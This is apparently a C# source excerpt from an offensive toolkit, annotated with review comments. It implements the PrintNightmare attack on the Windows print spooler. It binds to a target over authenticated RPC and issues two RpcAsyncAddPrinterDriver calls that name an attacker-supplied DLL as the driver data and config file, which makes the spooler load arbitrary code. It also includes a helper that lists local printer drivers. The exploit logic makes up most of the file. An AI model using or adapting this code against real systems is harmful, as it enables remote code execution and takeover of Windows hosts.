        /// <summary>
        /// Runs the PrintNightmare driver-install sequence this sample implements against
        /// <paramref name="target"/>: create an RPC binding, resolve the endpoint, select the
        /// object UUID, then issue two <see cref="AddPrinterDriver"/> calls whose DRIVER_INFO_2
        /// names <paramref name="exploit_path"/> as the driver data file. Progress and errors
        /// are written to the console.
        /// </summary>
        /// <param name="target">Host the RPC binding is created against.</param>
        /// <param name="exploit_path">Value used for pDataFile; its last path component is also
        /// used as the config file name of the second AddPrinterDriver attempt.</param>
        /// <param name="authuser">User name handed to DCSync.CreateBinding.</param>
        /// <param name="authdomain">Domain handed to DCSync.CreateBinding.</param>
        /// <param name="authpassword">Password handed to DCSync.CreateBinding.</param>
        /// <param name="auth">RPC authentication service; defaults to RPC_C_AUTHN_GSS_NEGOTIATE.</param>
        /// <param name="altservice">Service name handed to CreateBinding (presumably the SPN
        /// service class — confirm in CreateBinding); defaults to "host".</param>
        /// <returns>true only when both AddPrinterDriver calls report success; false on any
        /// earlier failure (binding, endpoint resolution, object UUID, or first driver add).</returns>
        public static bool RunPrintNightmare(string target, string exploit_path, string authuser, string authdomain, string authpassword, int auth = DCSync.RPC_C_AUTHN_GSS_NEGOTIATE, string altservice = "host")
        {
            // NOTE(review): prints only the "[*] " prefix — looks like an unfinished status line.
            Console.WriteLine("[*] ");

            // rpcConn is a field declared outside this block. The binding is requested with
            // delegate-level impersonation (RPC_C_IMP_LEVEL_DELEGATE).
            rpcConn = DCSync.CreateBinding(target, altservice, auth, authuser, authdomain, authpassword, impersonationType: DCSync.RPC_C_IMP_LEVEL_DELEGATE);

            if (rpcConn == IntPtr.Zero)
            {
                Console.WriteLine("Error CreateBinding");
                return(false);
            }

            // Resolve the partially bound handle to an endpoint for the client interface
            // (GetClientInterface is defined outside this block).
            NTSTATUS rpcStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());

            if (rpcStatus != NTSTATUS.Success)
            {
                Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)rpcStatus);

                return(false);
            }

            // Attach the object UUID (PAR_ObjectUUID is declared outside this block).
            rpcStatus = (NTSTATUS)RpcBindingSetObject(rpcConn, ref PAR_ObjectUUID);

            if (rpcStatus != NTSTATUS.Success)
            {
                // NOTE(review): the message says RpcBindingSetOption, but the call above is
                // RpcBindingSetObject.
                Console.WriteLine("[x] Error RpcBindingSetOption {0}", (int)rpcStatus);

                return(false);
            }

            // NOTE(review): the result of FindDriverPath is not validated; a null return would
            // leave driverpath equal to "\unidrv.dll" after the concatenation below.
            string driverpath = FindDriverPath(rpcConn);

            driverpath += "\\unidrv.dll";
            Console.WriteLine("[*] DriverPath: {0}", driverpath);

            // Environment is hard-coded to 64-bit Windows; pName is a random 10-character string
            // (RandomString is defined outside this block).
            string        environment = "Windows x64";
            DRIVER_INFO_2 dvi2        = new DRIVER_INFO_2
            {
                cVersion     = 3,
                pDataFile    = exploit_path,
                pEnvironment = environment,
                pDriverPath  = driverpath,
                pName        = RandomString(10)
            };

            // First attempt uses an existing system DLL as the config file. Both attempts go
            // through RpcAsyncAddPrinterDriver (see AddPrinterDriver), i.e. each one is a remote
            // printer-driver installation on the target.
            if (AddPrinterDriver(dvi2, rpcConn, "C:\\Windows\\System32\\kernelbase.dll"))
            {
                // Second attempt: fresh random name, config file = file-name portion of exploit_path.
                dvi2.pName = RandomString(10);
                string[] p = exploit_path.Split('\\');
                if (AddPrinterDriver(dvi2, rpcConn, p[p.Length - 1]))
                {
                    // NOTE(review): emits an empty line only.
                    Console.WriteLine();
                    return(true);
                }
            }

            return(false);
        }
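        /// <summary>
        /// Enumerates the printer drivers installed on the local machine (level-2
        /// EnumPrinterDrivers query with a null server and environment) and returns their names.
        /// </summary>
        /// <returns>The pName of every DRIVER_INFO_2 entry the spooler reported; empty if none.</returns>
        /// <exception cref="Win32Exception">
        /// The size probe failed with something other than ERROR_INSUFFICIENT_BUFFER, or the
        /// sized call failed.
        /// </exception>
        /// <exception cref="Exception">The zero-length probe unexpectedly succeeded.</exception>
        private List<string> GetInstalledPrinterDrivers()
        {
            // Win32 contract: calling with cbBuf == 0 fails with ERROR_INSUFFICIENT_BUFFER and
            // returns the number of bytes required in cbNeeded.
            const int ErrorInsufficientBuffer = 122; // ERROR_INSUFFICIENT_BUFFER
            const int DriverInfoLevel         = 2;   // DRIVER_INFO_2

            uint cbNeeded  = 0;
            uint cReturned = 0;

            if (EnumPrinterDrivers(null, null, DriverInfoLevel, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
            {
                // A zero-length buffer cannot hold the array, so success here violates the contract.
                throw new Exception("EnumPrinterDrivers should fail with a zero-length buffer!");
            }

            int lastWin32Error = Marshal.GetLastWin32Error();

            if (lastWin32Error != ErrorInsufficientBuffer)
            {
                throw new Win32Exception(lastWin32Error);
            }

            IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
            try
            {
                if (!EnumPrinterDrivers(null, null, DriverInfoLevel, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
                {
                    // The error code is read here, before the buffer is released in finally.
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }

                // The buffer holds cReturned contiguous DRIVER_INFO_2 structures. Walk it with
                // pointer-sized arithmetic: the previous IntPtr.ToInt32() throws OverflowException
                // for 64-bit addresses above 2 GB.
                Type         infoType = typeof(DRIVER_INFO_2);
                int          stride   = Marshal.SizeOf(infoType);
                List<string> result   = new List<string>((int)cReturned);

                for (int i = 0; i < cReturned; i++)
                {
                    IntPtr        entry = IntPtr.Add(pAddr, i * stride);
                    DRIVER_INFO_2 info  = (DRIVER_INFO_2)Marshal.PtrToStructure(entry, infoType);
                    result.Add(info.pName);
                }

                return result;
            }
            finally
            {
                // Released on every path; previously the buffer leaked when the sized call failed.
                Marshal.FreeHGlobal(pAddr);
            }
        }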
        /// <summary>
        /// Wraps <paramref name="dvi2"/> in a level-2 DRIVER_CONTAINER and submits it to the
        /// remote spooler through RpcAsyncAddPrinterDriver on <paramref name="hBinding"/>.
        /// </summary>
        /// <param name="dvi2">Driver description; its pConfigFile member is assigned here.
        /// Whether the caller observes that assignment depends on DRIVER_INFO_2 being a class
        /// or a struct (declared outside this block).</param>
        /// <param name="hBinding">RPC binding handle to the target spooler.</param>
        /// <param name="cfg">Config-file value: either a full path or a bare file name.</param>
        /// <returns>true if the RPC call returned NTSTATUS.Success; false otherwise.</returns>
        /// <remarks>
        /// The two AllocHGlobal buffers are never released in this block (no FreeHGlobal), so
        /// every call leaks the marshalled structures for the life of the process.
        /// From a monitoring standpoint this is the remote driver-install request that the
        /// target spooler's operational logging records — TODO confirm the applicable event IDs.
        /// </remarks>
        private static bool AddPrinterDriver(DRIVER_INFO_2 dvi2, IntPtr hBinding, string cfg)
        {
            DRIVER_CONTAINER container = new DRIVER_CONTAINER();
            // Base flags; exactly one of APD_COPY_NEW_FILES / APD_COPY_ALL_FILES is OR-ed in below.
            uint             dwFlags   = 0x00000010 | 0x8000; // APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER;

            container.Level = 2;

            string sConfig = "";

            // NOTE(review): "<= 0" also sends a path whose first character is '\' down the
            // bare-file-name branch, since IndexOf returns 0 for it.
            if (cfg.IndexOf('\\') <= 0)
            {
                // Bare name: prefixed with the x64 version-3 driver directory.
                sConfig  = string.Format("c:\\windows\\system32\\spool\\drivers\\x64\\3\\{0}", cfg);
                dwFlags |= 0x00000008;// APD_COPY_NEW_FILES
            }
            else
            {
                // Full path: used as given.
                sConfig  = cfg;
                dwFlags |= 0x00000004;// APD_COPY_ALL_FILES
            }
            dvi2.pConfigFile = sConfig;
            Console.WriteLine("[!] ConfigFile: {0}", dvi2.pConfigFile);

            // Marshal DRIVER_INFO_2 into unmanaged memory (fDeleteOld = false: nothing to free
            // in the fresh buffer). Not released anywhere in this block.
            IntPtr pDvi2 = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(DRIVER_INFO_2)));

            Marshal.StructureToPtr(dvi2, pDvi2, false);
            container.DriverInfo = pDvi2;
            // Same for the container that points at it; also never freed here.
            IntPtr pContainer = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(DRIVER_CONTAINER)));

            Marshal.StructureToPtr(container, pContainer, false);
            // GetStubPtr / GetProcStringPtr are defined outside this block; 116 is presumably an
            // offset into the stub's proc format string — confirm against their definitions.
            // The null argument is the server-name parameter of the RPC call.
            NTSTATUS ret = (NTSTATUS)RpcAsyncAddPrinterDriver(GetStubPtr(), GetProcStringPtr(116), hBinding, null, pContainer, dwFlags);

            if (ret == NTSTATUS.Success)
            {
                Console.WriteLine("[*] OK!");
                return(true);
            }
            else
            {
                // Failure is reported with the raw NTSTATUS enum value.
                Console.WriteLine("[x] KO! " + ret);
            }
            return(false);
        }